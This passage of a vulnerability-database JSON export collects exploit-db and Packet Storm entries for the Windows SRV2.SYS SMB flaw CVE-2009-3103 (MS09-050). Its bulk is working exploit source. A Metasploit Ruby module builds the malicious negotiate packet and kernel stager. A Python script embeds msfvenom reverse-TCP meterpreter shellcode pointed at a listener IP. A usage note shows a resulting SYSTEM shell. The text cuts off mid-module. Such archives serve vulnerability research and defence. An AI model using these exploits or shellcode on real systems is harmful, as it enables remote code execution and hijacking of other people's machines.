Workaround:\r\nhttp://www.microsoft.com/technet/security/advisory/975497.mspx\r\n\r\nVIII. REFERENCES\r\n-------------------------\r\nhttp://www.microsoft.com/technet/security/advisory/975497.mspx\r\nhttp://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx\r\n\r\nIX. CREDITS\r\n-------------------------\r\nThis vulnerability has been discovered by Laurent Gaffi\u00c3\u00a9\r\nLaurent.gaffie{remove-this}(at)gmail.com\r\n\r\nX. REVISION HISTORY\r\n-------------------------\r\nSeptember 7th, 2009: Initial release\r\nSeptember 11th, 2009: Revision 1.0 release\r\n\r\nXI. LEGAL NOTICES\r\n-------------------------\r\nThe information contained within this advisory is supplied \"as-is\"\r\nwith no warranties or guarantees of fitness of use or otherwise.\r\nI accept no responsibility for any damage caused by the use or\r\nmisuse of this information.\r\n\r\nXII.Personal Notes\r\n-------------------------\r\nMany persons have suggested to update this advisory for RCE and not BSOD:\r\nIt wont be done, if they find a way to execute code, they will publish them advisory.\r\n\r\n# milw0rm.com [2009-09-09]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9594/"}, {"lastseen": "2016-02-01T23:42:04", "osvdbidlist": ["57799"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference. CVE-2009-3103. Remote exploit for windows platform", "reporter": "metasploit", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3103"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16363", "href": "https://www.exploit-db.com/exploits/16363/", "sourceData": "##\r\n# $Id: ms09_050_smb2_negotiate_func_index.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::SMB\r\n\tinclude Msf::Exploit::KernelMode\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits an out of bounds function table dereference in the SMB\r\n\t\t\t\trequest validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\r\n\t\t\t\trelease candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista\r\n\t\t\t\twithout SP1 does not seem affected by this flaw.\r\n\t\t\t},\r\n\r\n\t\t\t'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm', 'sf' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9669 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'MSB', 'MS09-050' ],\r\n\t\t\t\t\t[ 'CVE', '2009-3103' ],\r\n\t\t\t\t\t[ 'BID', '36299' ],\r\n\t\t\t\t\t[ 'OSVDB', '57799' ],\r\n\t\t\t\t\t[ 'URL', 'http://seclists.org/fulldisclosure/2009/Sep/0039.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'EncoderType' => Msf::Encoder::Type::Raw,\r\n\t\t\t\t\t'ExtendedOptions' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Stager' => 'stager_sysenter_hook',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows Vista SP1/SP2 and Server 2008 (x86)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Ret' => 0xFFD00D09, # \"POP ESI; RET\" from the kernels HAL memory region ...no ASLR :)\r\n\t\t\t\t\t\t\t'ReadAddress' => 0xFFDF0D04, # A readable address from kernel space (no nulls in address).\r\n\t\t\t\t\t\t\t'ProcessIDHigh' => 0x0217, # srv2!SrvSnapShotScavengerTimer\r\n\t\t\t\t\t\t\t'MagicIndex' => 0x3FFFFFB4, # (DWORD)( MagicIndex*4 + 0x130 ) == 0\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Sep 07 2009'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(445),\r\n\t\t\t\tOptInt.new( 'WAIT', [ true, \"The number of seconds to wait for the attack to complete.\", 180 ] )\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\t# Not reliable enough for automation yet\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tprint_status( \"Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})...\" )\r\n\t\tconnect\r\n\r\n\t\t# we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest\r\n\t\t# and srv2!SrvProcPartialCompleteCompoundedRequest\r\n\t\tdialects = [ [ target['ReadAddress'] ].pack(\"V\") * 25, \"SMB 2.002\" ]\r\n\r\n\t\tdata = dialects.collect { |dialect| \"\\x02\" + dialect + \"\\x00\" }.join('')\r\n\t\tdata += [ 0x00000000 ].pack(\"V\") * 37 # Must be NULL's\r\n\t\tdata += [ 0xFFFFFFFF ].pack(\"V\") # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b)\r\n\t\tdata += [ 0xFFFFFFFF ].pack(\"V\") # Used in srv2!SrvConsumeDataAndComplete2+0x34\r\n\t\tdata += [ 0x42424242 ].pack(\"V\") * 7 # Unused\r\n\t\tdata += [ target['MagicIndex'] ].pack(\"V\") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E)\r\n\t\tdata += [ 0x41414141 ].pack(\"V\") * 6 # Unused\r\n\t\tdata += [ target.ret ].pack(\"V\") # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2\r\n\t\tdata += payload.encoded # Our ring0 -> ring3 shellcode\r\n\r\n\t\t# We gain code execution by returning into the SMB packet, begining with its header.\r\n\t\t# The SMB packets Magic Header value is 0xFF534D42 which assembles to \"CALL DWORD PTR [EBX+0x4D]; INC EDX\"\r\n\t\t# This will cause an access violation if executed as we can never set EBX to a valid pointer.\r\n\t\t# To overcome this we force an increment of the header value (via MagicIndex), transforming it to 0x00544D42.\r\n\t\t# This assembles to \"ADD BYTE PTR [EBP+ECX*2+0x42], DL\" which is fine as ECX will be zero and EBP is a vaild pointer.\r\n\t\t# We patch the Signature1 value to be a jump forward into our shellcode.\r\n\t\tpacket = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct\r\n\t\tpacket['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE\r\n\t\tpacket['Payload']['SMB'].v['Flags1'] = 0x18\r\n\t\tpacket['Payload']['SMB'].v['Flags2'] = 0xC853\r\n\t\tpacket['Payload']['SMB'].v['ProcessIDHigh'] = target['ProcessIDHigh']\r\n\t\tpacket['Payload']['SMB'].v['Signature1'] = 0x0158E900 # \"JMP DWORD 0x15D\" ; jump into our ring0 payload.\r\n\t\tpacket['Payload']['SMB'].v['Signature2'] = 0x00000000 # ...\r\n\t\tpacket['Payload']['SMB'].v['MultiplexID'] = rand( 0x10000 )\r\n\t\tpacket['Payload'].v['Payload'] = data\r\n\r\n\t\tpacket = packet.to_s\r\n\r\n\t\tprint_status( \"Sending the exploit packet (#{packet.length} bytes)...\" )\r\n\t\tsock.put( packet )\r\n\r\n\r\n\t\twtime = datastore['WAIT'].to_i\r\n\t\tprint_status( \"Waiting up to #{wtime} second#{wtime == 1 ? '' : 's'} for exploit to trigger...\" )\r\n\t\tstime = Time.now.to_i\r\n\r\n\r\n\t\tpoke_logins = %W{Guest Administrator}\r\n\t\tpoke_logins.each do |login|\r\n\t\t\tbegin\r\n\t\t\t\tsec = connect(false)\r\n\t\t\t\tsec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1))\r\n\t\t\trescue ::Exception => e\r\n\t\t\t\tsec.socket.close\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\twhile( stime + wtime > Time.now.to_i )\r\n\t\t\tselect(nil, nil, nil, 0.25)\r\n\t\t\tbreak if session_created?\r\n\t\tend\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16363/"}, {"lastseen": "2018-11-30T12:33:03", "osvdbidlist": [], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "", "reporter": "Exploit-DB", "published": "2016-02-26T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)", "enchantments": {"score": {"modified": "2018-11-30T12:33:03", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3103", "CVE-2009-2532", "CVE-2009-2526"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2016-02-26T00:00:00", "id": "EDB-ID:40280", "href": "https://www.exploit-db.com/exploits/40280", "sourceData": "# EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS09_050.py\r\n\r\n#!/usr/bin/python\r\n#This module depends on the linux command line program smbclient. \r\n#I can't find a python smb library for smb login. If you can find one, you can replace that part of the code with the smb login function in python.\r\n#The idea is that after the evil payload is injected by the first packet, it need to be trigger by an authentication event. Whether the authentication successes or not does not matter.\r\nimport tempfile\r\nimport sys\r\nimport subprocess\r\nfrom socket import socket\r\nfrom time import sleep\r\nfrom smb.SMBConnection import SMBConnection\r\n\r\n\r\ntry:\r\n\r\n\ttarget = sys.argv[1]\r\nexcept IndexError:\r\n\tprint '\\nUsage: %s <target ip>\\n' % sys.argv[0]\r\n\tprint 'Example: MS36299.py 192.168.1.1 1\\n'\r\n\tsys.exit(-1)\r\n\r\n#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443 EXITFUNC=thread -f python\r\nshell = \"\"\r\nshell += \"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\" #fce8820000006089e531c0648b\r\nshell += \"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\r\nshell += \"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\r\nshell += \"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\r\nshell += \"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\r\nshell += \"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\r\nshell += \"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\r\nshell += \"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\r\nshell += \"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\r\nshell += \"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\r\nshell += \"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\"\r\nshell += \"\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\"\r\nshell += \"\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\"\r\nshell += \"\\xff\\xd5\\x6a\\x05\\x68\\xc0\\xa8\\x1e\\x4d\\x68\\x02\\x00\\x01\"\r\nshell += \"\\xbb\\x89\\xe6\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\"\r\nshell += \"\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x6a\\x10\\x56\\x57\\x68\\x99\\xa5\"\r\nshell += \"\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0a\\xff\\x4e\\x08\\x75\\xec\"\r\nshell += \"\\xe8\\x61\\x00\\x00\\x00\\x6a\\x00\\x6a\\x04\\x56\\x57\\x68\\x02\"\r\nshell += \"\\xd9\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7e\\x36\\x8b\\x36\\x6a\"\r\nshell += \"\\x40\\x68\\x00\\x10\\x00\\x00\\x56\\x6a\\x00\\x68\\x58\\xa4\\x53\"\r\nshell += \"\\xe5\\xff\\xd5\\x93\\x53\\x6a\\x00\\x56\\x53\\x57\\x68\\x02\\xd9\"\r\nshell += \"\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7d\\x22\\x58\\x68\\x00\\x40\"\r\nshell += \"\\x00\\x00\\x6a\\x00\\x50\\x68\\x0b\\x2f\\x0f\\x30\\xff\\xd5\\x57\"\r\nshell += \"\\x68\\x75\\x6e\\x4d\\x61\\xff\\xd5\\x5e\\x5e\\xff\\x0c\\x24\\xe9\"\r\nshell += \"\\x71\\xff\\xff\\xff\\x01\\xc3\\x29\\xc6\\x75\\xc7\\xc3\\xbb\\xe0\"\r\nshell += \"\\x1d\\x2a\\x0a\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\"\r\nshell += \"\\x0a\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\"\r\nshell += \"\\x53\\xff\\xd5\"\r\n\r\n\r\n\r\nhost = target, 445\r\n\r\nbuff =\"\\x00\\x00\\x03\\x9e\\xff\\x53\\x4d\\x42\"\r\nbuff+=\"\\x72\\x00\\x00\\x00\\x00\\x18\\x53\\xc8\"\r\nbuff+=\"\\x17\\x02\" #high process ID\r\nbuff+=\"\\x00\\xe9\\x58\\x01\\x00\\x00\"\r\nbuff+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nbuff+=\"\\x00\\x00\\xfe\\xda\\x00\\x7b\\x03\\x02\"\r\nbuff+=\"\\x04\\x0d\\xdf\\xff\"*25\r\nbuff+=\"\\x00\\x02\\x53\\x4d\"\r\nbuff+=\"\\x42\\x20\\x32\\x2e\\x30\\x30\\x32\\x00\"\r\nbuff+=\"\\x00\\x00\\x00\\x00\"*37\r\nbuff+=\"\\xff\\xff\\xff\\xff\"*2\r\nbuff+=\"\\x42\\x42\\x42\\x42\"*7\r\nbuff+=\"\\xb4\\xff\\xff\\x3f\" #magic index\r\nbuff+=\"\\x41\\x41\\x41\\x41\"*6\r\nbuff+=\"\\x09\\x0d\\xd0\\xff\" #return address\r\n\r\n#stager_sysenter_hook from metasploit\r\n\r\nbuff+=\"\\xfc\\xfa\\xeb\\x1e\\x5e\\x68\\x76\\x01\"\r\nbuff+=\"\\x00\\x00\\x59\\x0f\\x32\\x89\\x46\\x5d\"\r\nbuff+=\"\\x8b\\x7e\\x61\\x89\\xf8\\x0f\\x30\\xb9\"\r\nbuff+=\"\\x16\\x02\\x00\\x00\\xf3\\xa4\\xfb\\xf4\"\r\nbuff+=\"\\xeb\\xfd\\xe8\\xdd\\xff\\xff\\xff\\x6a\"\r\nbuff+=\"\\x00\\x9c\\x60\\xe8\\x00\\x00\\x00\\x00\"\r\nbuff+=\"\\x58\\x8b\\x58\\x54\\x89\\x5c\\x24\\x24\"\r\nbuff+=\"\\x81\\xf9\\xde\\xc0\\xad\\xde\\x75\\x10\"\r\nbuff+=\"\\x68\\x76\\x01\\x00\\x00\\x59\\x89\\xd8\"\r\nbuff+=\"\\x31\\xd2\\x0f\\x30\\x31\\xc0\\xeb\\x31\"\r\nbuff+=\"\\x8b\\x32\\x0f\\xb6\\x1e\\x66\\x81\\xfb\"\r\nbuff+=\"\\xc3\\x00\\x75\\x25\\x8b\\x58\\x5c\\x8d\"\r\nbuff+=\"\\x5b\\x69\\x89\\x1a\\xb8\\x01\\x00\\x00\"\r\nbuff+=\"\\x80\\x0f\\xa2\\x81\\xe2\\x00\\x00\\x10\"\r\nbuff+=\"\\x00\\x74\\x0e\\xba\\x00\\xff\\x3f\\xc0\"\r\nbuff+=\"\\x83\\xc2\\x04\\x81\\x22\\xff\\xff\\xff\"\r\nbuff+=\"\\x7f\\x61\\x9d\\xc3\\xff\\xff\\xff\\xff\"\r\nbuff+=\"\\x00\\x04\\xdf\\xff\\x00\\x04\\xfe\\x7f\"\r\nbuff+=\"\\x60\\x6a\\x30\\x58\\x99\\x64\\x8b\\x18\"\r\nbuff+=\"\\x39\\x53\\x0c\\x74\\x2b\\x8b\\x43\\x10\"\r\nbuff+=\"\\x8b\\x40\\x3c\\x83\\xc0\\x28\\x8b\\x08\"\r\nbuff+=\"\\x03\\x48\\x03\\x81\\xf9\\x6c\\x61\\x73\"\r\nbuff+=\"\\x73\\x75\\x15\\xe8\\x07\\x00\\x00\\x00\"\r\nbuff+=\"\\xe8\\x0d\\x00\\x00\\x00\\xeb\\x09\\xb9\"\r\nbuff+=\"\\xde\\xc0\\xad\\xde\\x89\\xe2\\x0f\\x34\"\r\nbuff+=\"\\x61\\xc3\\x81\\xc4\\x54\\xf2\\xff\\xff\"\r\n\r\nbuff+=shell\r\n\r\ns = socket()\r\ns.connect(host)\r\ns.send(buff)\r\ns.close() \r\n#Trigger the above injected code via authenticated process.\r\nsubprocess.call(\"echo '1223456' | rpcclient -U Administrator %s\"%(target), shell=True)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40280"}, {"lastseen": "2016-02-01T20:20:26", "osvdbidlist": [], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050). CVE-2009-2526,CVE-2009-2532,CVE-2009-3103. Remote exploit for windows platform", "reporter": "Piotr Bania", "published": "2010-08-17T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - SRV2.SYS SMB Negotiate ProcessID Function Table Dereference MS09-050", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2532", "CVE-2009-2526", "CVE-2009-3103"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2010-08-17T00:00:00", "id": "EDB-ID:14674", "href": "https://www.exploit-db.com/exploits/14674/", "sourceData": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference\r\n---------------------------------------------------------------------\r\n\r\nExploited by Piotr Bania // www.piotrbania.com\r\nExploit for Vista SP2/SP1 only, should be reliable!\r\n\r\nTested on:\r\nVista sp2 (6.0.6002.18005)\r\nVista sp1 ultimate (6.0.6001.18000)\r\n\r\nKudos for:\r\nStephen, HDM, Laurent Gaffie(bug) and all the mates i know, peace.\r\nSpecial kudos for prdelka for testing this shit and all the hosters.\r\n\r\n\r\nSample usage\r\n------------\r\n\r\n> smb2_exploit.exe 192.167.0.5 45 0\r\n> telnet 192.167.0.5 28876\r\n\r\nMicrosoft Windows [Version 6.0.6001]\r\nCopyright (c) 2006 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Windows\\system32>whoami\r\nwhoami\r\nnt authority\\system\r\nC:\\Windows\\system32>\r\n\r\nWhen all is done it should spawn a port TARGET_IP:28876\r\n\r\n\r\nRELEASE UPDATE 08/2010:\r\n----------------------\r\nThis exploit was created almost a year ago and wasnt modified from that time\r\nwhatsoever. The vulnerability itself is patched for a long time already so\r\ni have decided to release this little exploit. You use it for your own\r\nresponsibility and im not responsible for any potential damage this thing\r\ncan cause. Finally i don't care whether it worked for you or not.\r\n\r\nP.S the technique itself is described here:\r\nhttp://blog.metasploit.com/2009/10/smb2-351-packets-from-trampoline.html\r\n\r\n===========================================================================\r\nDownload:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14674.zip (smb2_exploit_release.zip)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/14674/"}], "packetstorm": [{"lastseen": "2016-12-05T22:12:29", "references": [], "edition": 1, "description": "", "reporter": "H D Moore", "published": "2010-02-26T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "packetstorm", "title": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3103"], "modified": "2010-02-26T00:00:00", "href": "https://packetstormsecurity.com/files/86712/Microsoft-SRV2.SYS-SMB-Negotiate-ProcessID-Function-Table-Dereference.html", "id": "PACKETSTORM:86712", "sourceData": "`## \n# $Id: ms09_050_smb2_negotiate_func_index.rb 8656 2010-02-26 13:42:17Z sf $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::SMB \ninclude Msf::Exploit::KernelMode \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference', \n'Description' => %q{ \nThis module exploits an out of bounds function table dereference in the SMB \nrequest validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 \nrelease candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista \nwithout SP1 does not seem affected by this flaw. \n}, \n \n'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm', 'sf' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 8656 $', \n'References' => \n[ \n[ 'MSB', 'MS09-050' ], \n[ 'CVE', '2009-3103' ], \n[ 'BID', '36299' ], \n[ 'OSVDB', '57799' ], \n[ 'URL', 'http://seclists.org/fulldisclosure/2009/Sep/0039.html' ], \n[ 'URL', 'http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 1024, \n'StackAdjustment' => -3500, \n'DisableNops' => true, \n'EncoderType' => Msf::Encoder::Type::Raw, \n'ExtendedOptions' => \n{ \n'Stager' => 'stager_sysenter_hook', \n} \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows Vista SP1/SP2 and Server 2008 (x86)', \n{ \n'Platform' => 'win', \n'Arch' => [ ARCH_X86 ], \n'Ret' => 0xFFD00D09, # \"POP ESI; RET\" from the kernels HAL memory region ...no ASLR :) \n'ReadAddress' => 0xFFDF0D04, # A readable address from kernel space (no nulls in address). \n'ProcessIDHigh' => 0x0217, # srv2!SrvSnapShotScavengerTimer \n'MagicIndex' => 0x3FFFFFB4, # (DWORD)( MagicIndex*4 + 0x130 ) == 0 \n} \n], \n], \n'DefaultTarget' => 0 \n)) \n \nregister_options( [ Opt::RPORT(445), OptInt.new( 'WAIT', [ true, \"The number of seconds to wait for the attack to complete.\", 180 ] ) ], self.class ) \nend \n \n# Not reliable enough for automation yet \ndef autofilter \nfalse \nend \n \ndef exploit \nprint_status( \"Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})...\" ) \nconnect \n \n# we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest \n# and srv2!SrvProcPartialCompleteCompoundedRequest \ndialects = [ [ target['ReadAddress'] ].pack(\"V\") * 25, \"SMB 2.002\" ] \n \ndata = dialects.collect { |dialect| \"\\x02\" + dialect + \"\\x00\" }.join('') \ndata += [ 0x00000000 ].pack(\"V\") * 37 # Must be NULL's \ndata += [ 0xFFFFFFFF ].pack(\"V\") # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b) \ndata += [ 0xFFFFFFFF ].pack(\"V\") # Used in srv2!SrvConsumeDataAndComplete2+0x34 \ndata += [ 0x42424242 ].pack(\"V\") * 7 # Unused \ndata += [ target['MagicIndex'] ].pack(\"V\") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E) \ndata += [ 0x41414141 ].pack(\"V\") * 6 # Unused \ndata += [ target.ret ].pack(\"V\") # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2 \ndata += payload.encoded # Our ring0 -> ring3 shellcode \n \n# We gain code execution by returning into the SMB packet, begining with its header. \n# The SMB packets Magic Header value is 0xFF534D42 which assembles to \"CALL DWORD PTR [EBX+0x4D]; INC EDX\" \n# This will cause an access violation if executed as we can never set EBX to a valid pointer. \n# To overcome this we force an increment of the header value (via MagicIndex), transforming it to 0x00544D42. \n# This assembles to \"ADD BYTE PTR [EBP+ECX*2+0x42], DL\" which is fine as ECX will be zero and EBP is a vaild pointer. \n# We patch the Signature1 value to be a jump forward into our shellcode. \npacket = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct \npacket['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE \npacket['Payload']['SMB'].v['Flags1'] = 0x18 \npacket['Payload']['SMB'].v['Flags2'] = 0xC853 \npacket['Payload']['SMB'].v['ProcessIDHigh'] = target['ProcessIDHigh'] \npacket['Payload']['SMB'].v['Signature1'] = 0x0158E900 # \"JMP DWORD 0x15D\" ; jump into our ring0 payload. \npacket['Payload']['SMB'].v['Signature2'] = 0x00000000 # ... \npacket['Payload']['SMB'].v['MultiplexID'] = rand( 0x10000 ) \npacket['Payload'].v['Payload'] = data \n \npacket = packet.to_s \n \nprint_status( \"Sending the exploit packet (#{packet.length} bytes)...\" ) \nsock.put( packet ) \n \n \nwtime = datastore['WAIT'].to_i \nprint_status( \"Waiting up to #{wtime} second#{wtime == 1 ? '' : 's'} for exploit to trigger...\" ) \nstime = Time.now.to_i \n \n \npoke_logins = %W{Guest Administrator} \npoke_logins.each do |login| \nbegin \nsec = connect(false) \nsec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1)) \nrescue ::Exception => e \nsec.socket.close \nend \nend \n \nwhile( stime + wtime > Time.now.to_i ) \nselect(nil, nil, nil, 0.25) \nbreak if session_created? \nend \n \nhandler \ndisconnect \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/86712/ms09_050_smb2_negotiate_func_index.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:13:35", "references": [], "edition": 1, "description": "", "reporter": "laurent gaffie", "published": "2009-09-29T00:00:00", "type": "packetstorm", "title": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3103"], "modified": "2009-09-29T00:00:00", "href": "https://packetstormsecurity.com/files/81723/Microsoft-SRV2.SYS-SMB-Negotiate-ProcessID-Function-Table-Dereference.html", "id": "PACKETSTORM:81723", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::SMB \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference', \n'Description' => %q{ \nThis module exploits an out of bounds function table dereference in the SMB \nrequest validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 